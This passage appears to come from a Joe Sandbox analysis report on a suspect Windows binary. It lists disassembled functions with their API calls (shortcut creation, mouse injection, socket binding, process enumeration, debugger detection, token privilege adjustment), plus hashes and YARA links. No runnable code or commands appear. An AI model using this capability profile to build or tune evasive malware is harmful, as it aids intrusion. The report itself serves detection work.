                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D43160711083459BC305EF64E8918EFB7E8BF92314F444A1EF4D193292EB30AA09D7A3
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001464DC
                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00146639
                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0016FCF8,00000000,00000001,0016FB68,?), ref: 00146650
                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001468D4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                                                                                          • API String ID: 886957087-24824748
                                                                                                                                                                                                                                          • Opcode ID: 4fbf70f65326f8214cca90d558f63e699e2ab7de5fcae8ad1340722cd1f10115
                                                                                                                                                                                                                                          • Instruction ID: 895edaca30f2500e07156e36bb7fdb829644b1feeef4984855d9b4462bec56b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fbf70f65326f8214cca90d558f63e699e2ab7de5fcae8ad1340722cd1f10115
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BD128715083019FD314EF24C8819ABB7E9FF95708F40496EF5958B2A2EB71ED05CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001522DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 001522E8
                                                                                                                                                                                                                                            • Part of subcall function 0014E4EC: GetWindowRect.USER32(?,?), ref: 0014E504
                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00152312
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00152319
                                                                                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00152355
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00152381
                                                                                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001523DF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2387181109-0
                                                                                                                                                                                                                                          • Opcode ID: 384ded417fef7c085804f489cafaf49e1020634deb810ded6a8d42d5af90d819
                                                                                                                                                                                                                                          • Instruction ID: 6cce40db45c216dcb762d22f8c47f93572299bcf9217b5a88d00fb030f8c6564
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 384ded417fef7c085804f489cafaf49e1020634deb810ded6a8d42d5af90d819
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9031ED72104305ABC720DF54CC48BABBBE9FF89314F000A19F8959B291DB74EA48CBD2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00149B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00149B78
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00149C8B
                                                                                                                                                                                                                                            • Part of subcall function 00143874: GetInputState.USER32 ref: 001438CB
                                                                                                                                                                                                                                            • Part of subcall function 00143874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00143966
                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00149BA8
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00149C75
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                          • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                          • Opcode ID: 80a37903aefb38a4f8c10a5dd869f8c49c7d192c725ae35adff18ec03afe2604
                                                                                                                                                                                                                                          • Instruction ID: 1abdc0cb657405e242eff960bb621e2223ab461d74602f7de1332929f5736462
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80a37903aefb38a4f8c10a5dd869f8c49c7d192c725ae35adff18ec03afe2604
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA41517194420A9FCF14DF64CD85AEFBBB8EF05311F244156E815A62A1EB309E94CFA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 000E9A4E
                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 000E9B23
                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 000E9B36
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Color$LongProcWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3131106179-0
                                                                                                                                                                                                                                          • Opcode ID: 96cb1e2f47f7e33b2b9199ea909f97aa17cc0c2b39507d91ea311c0fd129a643
                                                                                                                                                                                                                                          • Instruction ID: da2a2735effb2fea0113962f0243bbbd7c42ae01175735befb7108ca088953de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96cb1e2f47f7e33b2b9199ea909f97aa17cc0c2b39507d91ea311c0fd129a643
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40A12A702085A4BFE739AA3E9C58D7F369DDF42344F190219F502E6AD2CB259D51C2B3
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00151806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0015304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0015307A
                                                                                                                                                                                                                                            • Part of subcall function 0015304E: _wcslen.LIBCMT ref: 0015309B
                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0015185D
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00151884
                                                                                                                                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 001518DB
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001518E6
                                                                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 00151915
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1601658205-0
                                                                                                                                                                                                                                          • Opcode ID: 343334b7af93d836764b0d62eff8955a79efb2a1c086f9dc773825ee373e137c
                                                                                                                                                                                                                                          • Instruction ID: 2c509c20c2f19c38ef2dc0ced55a8b78cd421cdb3d3a2463d0c3d69a35ae2bcd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 343334b7af93d836764b0d62eff8955a79efb2a1c086f9dc773825ee373e137c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0651C571A00200AFD721AF24C886F6A77E5AB44718F44805DF959AF3C3D7B1AD41CBE1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00161C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 292994002-0
                                                                                                                                                                                                                                          • Opcode ID: 0d1efe1c2f0670858a35a0a35a034da47393fc965d3f80397d64cf6123951d7c
                                                                                                                                                                                                                                          • Instruction ID: 751865774a00e0f35c3180df0647abd9808695a6ba662194534a4436dee76a26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d1efe1c2f0670858a35a0a35a034da47393fc965d3f80397d64cf6123951d7c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4121A3317406116FD7209F1ACC44F6A7BA5EF95325B1D8069E84ACB351CBB1DC52CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0015A6AC
                                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0015A6BA
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0015A79C
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0015A7AB
                                                                                                                                                                                                                                            • Part of subcall function 000ECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00113303,?), ref: 000ECE8A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1991900642-0
                                                                                                                                                                                                                                          • Opcode ID: dba6b04145e8d5628c1b31ba0f5416cb0898c8af65c4ade07ba2d836418d102f
                                                                                                                                                                                                                                          • Instruction ID: b6a054ad23819206cb3a4862f0c4a62d499d91779c502d905f949cd9846f1236
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dba6b04145e8d5628c1b31ba0f5416cb0898c8af65c4ade07ba2d836418d102f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F516F715083019FD310DF24C886AABBBE8FF89754F40491EF99597352EB71D904CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00115222), ref: 0013DBCE
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0013DBDD
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0013DBEE
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0013DBFA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2695905019-0
                                                                                                                                                                                                                                          • Opcode ID: b79b71d7db74abf78652d017e117b577db04ba19722ceea598f7cad5351c0500
                                                                                                                                                                                                                                          • Instruction ID: 966e779e12200af0d1f9347b88bfad4c7a74fc6ab240df166aedae36c5575f06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b79b71d7db74abf78652d017e117b577db04ba19722ceea598f7cad5351c0500
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2F0A970820910A7C2206B78BC0D8BA77AD9F02334F10470AF8B6C24E0EBF09994C6D6
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00145C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00145CC1
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00145D17
                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00145D5F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3541575487-0
                                                                                                                                                                                                                                          • Opcode ID: db99d40e8619246b39fb7174905779d35c05a89ccc0356747ebff5d02b2efef3
                                                                                                                                                                                                                                          • Instruction ID: ea88df73f85de11cc63204cdc2fd745afa9eed5129e95733bfae795568ffd66c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db99d40e8619246b39fb7174905779d35c05a89ccc0356747ebff5d02b2efef3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C518C34A04B019FC714DF68C894E96B7E5FF49314F14855EE99A8B3A2DB30ED44CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00102622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0010271A
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00102724
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00102731
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                          • Opcode ID: f561cb8e28d9976e85dd3a119a4fc22b179a4cb397699f0e99b015bcb009dd82
                                                                                                                                                                                                                                          • Instruction ID: fae021cd44392b87940a724787505151c47c4dc8886b47c5fb34d44cb4ec8738
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f561cb8e28d9976e85dd3a119a4fc22b179a4cb397699f0e99b015bcb009dd82
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9931B47491121C9BCB21DF64DC897D9B7B8BF18310F5041EAE91CA6661EB709F818F45
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001451CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 001451DA
                                                                                                                                                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00145238
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 001452A1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1682464887-0
                                                                                                                                                                                                                                          • Opcode ID: 509aac01b1666f6a76801abe3588309ff609bb626a17d0f8846b2f2352f767b0
                                                                                                                                                                                                                                          • Instruction ID: 837a61db304bb5fbf8e144410962356d04942a505e2a5c3a226cc61fd2c6ea3d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 509aac01b1666f6a76801abe3588309ff609bb626a17d0f8846b2f2352f767b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A314F75A00618DFDB00DF54D884EEDBBB5FF49314F04809AE8499B362DB71E855CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001316C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 000F0668
                                                                                                                                                                                                                                            • Part of subcall function 000EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 000F0685
                                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0013170D
                                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0013173A
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0013174A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
